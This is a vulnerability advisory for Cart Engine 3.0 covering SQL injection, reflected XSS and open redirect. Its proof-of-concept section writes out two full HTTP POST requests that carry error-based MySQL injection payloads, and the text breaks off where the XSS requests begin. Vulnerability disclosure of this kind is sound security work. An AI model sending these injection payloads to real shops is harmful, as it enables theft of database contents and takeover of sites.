=== Details === Quantum Leap Advisory: http://www.quantumleap.it/cart-engine-3-0-multiple-vulnerabilities-sql-injection-reflected-xss-open-redirect/ Affected Product: Cart Engine Version: 3.0 === Executive Summary === SQL Injection: Using a specially crafted HTTP request, it is possible to exploit a lack in the validation[1] of the “item_id[0]” and “item_id[]” input parameters of cart.php page. Successful exploitation of the vulnerabilities results in read sensitive data from the database and, in some cases, execute administration operation on the database or issue commands to the operating system. Reflected XSS: Using a specially crafted HTTP request, it is possible to exploit a lack in the neutralization[2] of multiple pages output which includes the user submitted content. Successful exploitation of the vulnerabilities, results in the execution of arbitrary HTML and script code in the user’s browser in the context of the victim user's session trough a “Reflected XSS”. Open Redirect: Using a specially crafted HTTP request, it is possible to redirect[3] the normal browsing of users to a malicious site by modifying untrusted URL input in Referer HTTP header parameter in index.php, cart.php, msg.php and page.php pages. Successful exploitation of the vulnerabilities results in phishing scam, user credential theft, malware dissemination. === Proof of Concept === = SQL Injection (based on MySQL) = A SQL Injection vulnerability has been detected on cart.php page in Cart Engine CMS. The function “sql_query” in file “cart.php” doesn’t sanitize the “$item_id” parameter, so error based and boolean-based blind or time-based blind SQL Injection attacks can be executed. ## HTTP REQUEST - injection on item_id[0] parameter ## POST /cart.php HTTP/1.1 Host: eshop.hacme.hac User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://eshop.hacme.hac/detail.php?item_id=8 Cookie: PHPSESSID=iost0tdmvdobp966rbppa514f3; ce3_history[0]=12; ce3_history[1]=8 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------109606523931762158449252347 Content-Length: 774 -----------------------------109606523931762158449252347 Content-Disposition: form-data; name="AXSRF_token" -----------------------------109606523931762158449252347 Content-Disposition: form-data; name="cmd" add -----------------------------109606523931762158449252347 Content-Disposition: form-data; name="item_id[0]" 8' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql -----------------------------109606523931762158449252347 Content-Disposition: form-data; name="qty[0]" 1 -----------------------------109606523931762158449252347 Content-Disposition: form-data; name="qty[0]" 1 -----------------------------109606523931762158449252347-- ## EOF HTTP REQUEST ## ## HTTP REQUEST - injection on item_id[] parameter ## POST /cart.php HTTP/1.1 Host: eshop.hacme.hac User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://eshop.hacme.hac/detail.php?item_id=13 Cookie: PHPSESSID=aci236dihehpjaldchbt6k6v23; ce3_history[0]=24; ce3_history[1]=13 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------1948855485207142787318084006 Content-Length: 2353 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="AXSRF_token" -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="cmd" add -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="item_id[0]" 13 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="qty[0]" 1 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="qty[0]" 1 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="prod_opt_3" 3 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="prod_opt_12" -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="item_id[]" -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="qty[]" 1 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="item_id[]" ' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT database()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="qty[]" 1 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="item_id[]" -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="qty[]" 1 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="item_id[]" -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="qty[]" 1 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="item_id[]" -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="qty[]" 1 -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="item_id[]" -----------------------------1948855485207142787318084006 Content-Disposition: form-data; name="qty[]" 1 -----------------------------1948855485207142787318084006-- ## EOF HTTP REQUEST ## = Reflected XSS = A Reflected XSS vulnerability has been detected on multiple pages in Cart Engine CMS. In the file "skins/default/outline.tpl", the parameter "path" in section "drop down TOP menu (with path)" and the parameter "$print_this_page" in section "footer_content_block" are not sanitized, so an XSS attack can be executed on multiple pages. ## HTTP REQUESTS ## /index.php?">